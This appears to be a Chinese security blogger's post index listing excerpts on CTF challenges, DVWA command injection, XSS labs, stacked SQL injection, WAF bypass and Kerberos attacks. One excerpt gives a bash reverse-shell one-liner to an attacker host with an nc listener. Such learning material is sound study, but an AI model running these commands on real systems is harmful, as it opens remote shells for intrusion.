- 博客(25)
- 资源 (5)
- 收藏
- 关注
RSS订阅原创 CentOS 7 与 Ubuntu 16.4下设置静态IP(亲测有效)
原文链接请点击:https://www.cnblogs.com/ruoli-s/p/15394349.html一、整体设置1. 虚拟机环境VMware 15.5.6 build-16341506Ubuntu 16.04 x86_64CentOS Linux release 7.9.20092. 本机网络配置 右键单击网络图标,依次选择打开网络中心和Internet设置 --> 更改适配器选项 --> 右键单击vmnet8 --> 属性 ,将Internet协议版本4改成手.
2021-10-12 13:40:29
257
原创 数据库语法整理及WAF绕过方式
关系型数据库关系型数据库:指采用了关系模型来组织数据的数据库。直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDBOracleOracle特性:select id,contents,time from news where news_id=1 ① union ② sele
2021-09-30 10:37:32
2262
原创 python-nmap模块运行报错‘module‘ object has no attribute ‘PortScanner‘
python使用nmap模块时报错File “nmap.py”, line 10, in nm = nmap.PortScanner()AttributeError: ‘module’ object has no attribute ‘PortScanner’解决方法 卸载nmap模块和python-nmap模块,重新安装python-nmap即可。#先卸载之前安装过的pip uninstall nmappip uninstall python-nmap#再进行安装pip ins
2021-04-28 16:04:52
989
转载 Kerberos协议探索系列之扫描与爆破篇
0x00 前言Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。在了解Kerberos的过程中,发现很多网站上的相关文章有一些是机器直接翻译过来的,也有一些写的比较优秀的文章,但是实操性比较弱,可能第一次了解Kerberos的同学会不知道怎么上手。所以本文主要是通过更详细的实验结合原理来说明与Kerberos相关的一些攻击手法。本文将分为三篇。第一篇也就是这一篇的内容主要包括域环境和Kerberos协议的说明以.
2021-03-24 17:18:26
594
转载 日志分析
总结——用于备忘和交流学习一.web日志分析(一)、特征字符分析1.sql注入2. 数据库类型判断有以上信息可以尝试判断是否为sql注入(二)、访问频率分析二.系统日志分析(一)、Linux(二)、Windows三.练习题题目来源:墨者学院1.分析谷歌爬虫IP先标记404,观察到其密集存在于210.185.192.212这个IP,再同时标记上这个IP,确实是一直在爬取网站的图片。输入IP即得到key。我最先使用的是notepad++,后来想到用excal按空格分列显
2021-03-22 10:59:36
9206
3
转载 如何从日志文件溯源出攻击手法?
本文讲的是如何从日志文件溯源出攻击手法?,如果想要查清系统遭到黑客入侵的原因或漏洞,通过日志查找是一种很好的方法。日志文件是由服务器提供的非常有价值的信息。几乎所有的服务器,服务和应用程序都提供某种日志记录。但是什么是日志文件?日志文件是记录服务或应用程序运行期间发生的事件和操作。那么为什么日志文件如此重要?日志文件为我们提供了服务器行为的精确视图,以及有关正在访问服务器的时间,方式和“由谁”的关键信息。这种信息可以帮助我们监控性能,排除故障和调试应用程序,以及日志可以帮助取证调查人员分析导致恶意活动的事
2021-03-21 18:07:18
3988
原创 Apache logs目录下找不见access.log文件解决办法
Apache logs目录下找不见access.log文件解决办法原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14561391.html 今天在做测试的时候,忽然发现,咦,我的apache服务器logs目录下,为什么没有access文件呢?有点懵。。。 好吧,网上搜了下,原来是需要在https.conf文件中修改一下配置信息。在C:\Apache\conf\httpd.conf中修改 接下来重启phpstudy,进行验证。 OK,完美解决!
2021-03-20 18:30:42
863
转载 干货|2020渗透测试面试问题大全 建议收藏
转自HACK之道 乌雲安全 渗透篇0.渗透测试知识体系结构1、介绍一下自认为有趣的挖洞经历挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等…2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案?SQL注入、密码组合,前者防护分为
2021-01-28 20:16:13
20088
1
原创 DVWA通关之命令注入(command injection)
DVWA通关之命令注入(command injection) 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14340551.html 难度等级:low过关思路我们先将其难度设置为low,看到其界面如下:通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1和www.baidu.com测试如下:127.0.0.1www.baidu.com可以看到,IP地址和域名都是能够ping通的,接下来就是使用命令拼
2021-01-28 16:35:16
588
原创 XSStrike工具的安装及使用
XSStrike是一款检测Cross Site Scripting的高级检测工具。它集成了payload生成器、爬虫和模糊引擎功能。
2021-01-26 20:30:04
7232
2
原创 xss-labs通关挑战(xss challenge)
XSS-labs通关挑战(xss challenge)0x00 xss-labs 最近在看xss,今天也就来做一下xss-labs通过挑战。找了好久的源码,终于被我给找到了,因为在GitHub上大家也知道那个下载速度,所以,我也就直接转接到自己的码云上去了,在这也贴出来,欢迎大家下载使用。 源码链接请点击:https://gitee.com/ruoli-s/xss-labs 安装没啥好说的,直接放进自己搭建好的www目录下,就可以开始闯关了,xss-labs一共有level 20,做着看吧。
2021-01-16 00:02:12
2017
原创 【Linux】kali 安装 python3 和 pip3(亲测有效)
【Linux】kali 安装 python3 和 pip3原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14281673.html引言: 在使用kali的时候,经常会用到各种工具以及脚本,而大多数脚本都是以python编写的,但是烦就烦在python有2个版本,有些是以python2编写的,有些又是以python3编写的,所以避免麻烦,索性全部装好。 本人就在安装xsser的时候遇到了,相信大多数的kali都是自带python2的,但是xsser需要用pyt
2021-01-15 13:57:20
1018
原创 解决GitHub下载速度慢的问题(已解决)
解决GitHub下载速度慢的问题(已解决)核心:通过码云导入github资源,通过码云转接下载。1.找到需要下载的GitHub地址\color{blue}{1. 找到需要下载的GitHub地址}1.找到需要下载的GitHub地址
2021-01-14 16:06:16
2053
原创 Typora笔记上传到播客时图片不显示问题解决(已解决)
前言: 相信我们都遇到过,使用Typora做笔记是一件非常令人舒服的事,然而,它却有一个非常难受的地方,那就是我们在做完笔记想要将其上传到自己的博客时,复制粘贴的图片无法显示。因为Typora复制的图片是在本地进行了保存,所以,我们只需要让其将图片自动上传到云上,所有的图片链接使用网页链接即可解决问题。安装所需gitee+typora+PicGo0x01. 准备安装PicGo:https://molunerfinn.com/PicGo/Typora:https://www.typora.io
2020-12-30 15:55:07
3075
4
原创 Stached injection -- 堆叠注入
Stached injection – 堆叠注入原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html0x00 堆叠注入的定义 Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。0x01 堆叠注入的原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
2020-12-30 13:52:44
202
原创 python安装whl包时出现的问题解决:is not a supported wheel on this platform
文章目录一、问题二、查找问题三、问题解决一、问题1、下载一个twisted包安装Twisted,进入https://www.lfd.uci.edu/~gohlke/pythonlibs 下载对应twisted下载好之后 ,我将Twisted-18.4.0-cp36-cp36m-win_amd64.whl,放在E:\\Twisted-18.4.0-cp36-cp36m-win_amd64.whl根据你的Python的版本选择合适的包,名称中间的cp36是python3.6的意思,amd64是pyt
2020-12-26 17:51:47
2311
原创 web渗透常见shell反弹姿势
常见反弹shell总结:一、bash反弹通用① 在kali机里面开启端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用② 在目标主机上执行:bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号③ 解释bash -i: 打开一个交互的bash.>&: 标准错误输出重定向到标准输出/dev/tcp/x.x.x.x/port : 意为调
2020-11-28 16:44:39
761
原创 CTF常见编码及加解密(超全)
title: CTF常见编码(超全)author: ruolitags:ctf编码密码安全categories: MISCsummary: 这是整理的最全的ctf常见加解密,以及编码,不看后悔!!abbrlink: a36cdate: 2020-11-18 08:32:39前言 最近打了场ctf,真的是被各种编码以及加密方式给搞怕了,所以,今天就来整理一下ctf中常见的编码,顺便给这次比赛做一个总结。常见CTF编码及加解密补充计算机中的数据都是按字节存储。一个字节(.
2020-11-19 18:16:34
18335
3
原创 攻防世界_MISC进阶区_心仪的公司
题目名称: 心仪的公司难度系数: ★★题目来源: 世安杯题目附件: 附件1前言继续我的MISC刷题之旅,简单的来记录一下这道题还是先下载附件,我们可以看到是一个wires hark流量包,打开之后,先是一通乱搜,无果,回头看题目附件,发现有webshell字样,最后输入:http contains "shell" ,发现有点东西,锁定最后一条,直接追踪HTTP流,发现flag···fl4g:{ftop_Is_Waiting_4_y}···之后看了其他大佬的w
2020-11-12 09:58:34
2356
3
原创 攻防世界_MISC进阶区_simple_transfer
又做到了一个难缠的题(对于饶了很多弯的我来说、、、呜呜呜)哎,话不多说了,直接看题吧我们下载附件,看到是一个抓包分析的题。第一步当然是直接打开,搜索flag,发现无果,果断到统计–>协议分级查看:可以看到,协议的字节百分比占用基本全在NFS协议上,直接过滤NFS观察报文,发现有个pdf文件直接foremost分解;这里是因为文件名太长,我提前给重命名了打开pdf文件,里面什么都没有,右键单击,发现又复制图片,所以知道应该是有图片给遮挡住了。直接CTRL + A 全选,
2020-11-11 20:40:21
3054
2
原创 攻防世界_MISC进阶区_Get-the-key.txt(详细)
攻防世界MISC进阶之Get-the-key.txt啥话也不说,咱们直接看题吧!首先下载附件看到一个压缩包:我们直接解压,看到一个文件,也没有后缀名,先用 file 看一下文件属性:发现是是Linux的文件系统数据,我们找个目录将它挂载起来看看,mkdir /tmp/forensic100mount -o loop forensic100 /tmp/forensic/进入该目录,查看如下:好家伙,这出来了一堆,到底是哪个??我们再返回去看题目:貌似是让我们找一个key.txt
2020-11-10 16:46:09
473
原创 攻防世界_MISC进阶区_stage 1
我们先下载附件,得到一张PNG图片如下:也没什么想法,现扔到我们的神器:stegsovle中,看看能出来点什么。。。不愧是神器,还真得到了一个二维码:使用二维码扫描器:QRreserch,得到以下内容:03F30D0AB6266A576300000000000000000100000040000000730D0000006400008400005A00006401005328020000006300000000030000000800000043000000734E0000006401006.
2020-11-08 21:24:27
663
原创 攻防世界_MISC进阶区_a_good_idea
a_good_idea下载附件得到首先,我们解压看一下:检查Exif信息,发现无果。用文本编辑器打开也是一堆了乱码。所以,我们直接用winhex打开:果然有了新的发现,PK,(发现PK,就说明内藏有压缩文件)果断修改文件后缀名:然后进行解压。不负我的一片痴心,成功解压出来一问价夹,打开后如下:看到这里,我们先来打开txt文件,看这意思是让我们注意像素,将两张图片全部拖进stegsolve中,点击右键,发现没什么卵用,>_<细想一下,发现给出的图片文件名很有意思
2020-11-08 09:38:53
513
原创 TCP连接的建立与释放(超详细)
前言:在计算机网络协议中,TCP只是其中一个,然而在网络使用中,TCP也是最离不开的协议之一,它的重要性毋庸置疑,最最重要的是,面试的重点就是它啊,呜呜~~,今天我们一起来看下TCP的连接建立与释放,相信很多小伙伴也想给他一次性整明白。TCP连接的建立下图给出TCP三次握手的过程:在进入正文之前先让我们来复习复习几个选项位,待会会用到哦!!!确认ACK仅当ACK = 1 时确认号字段才有效。当ACK = 0 时,确认号无效。TCP规定:在连接建立后,所有传送的报文段都必须把ACK置为1。同
2020-10-09 09:05:47
7365
原创 CISP-PTE知识体系
CISP-PTE知识体系Wevb安全HTTP请求方式HTTP的状态码欢迎使用Markdow新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入Wevb安全HTTP请求方式HTTP的状态码欢迎使用Markdow你好! 这
2020-09-18 17:43:18
635
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人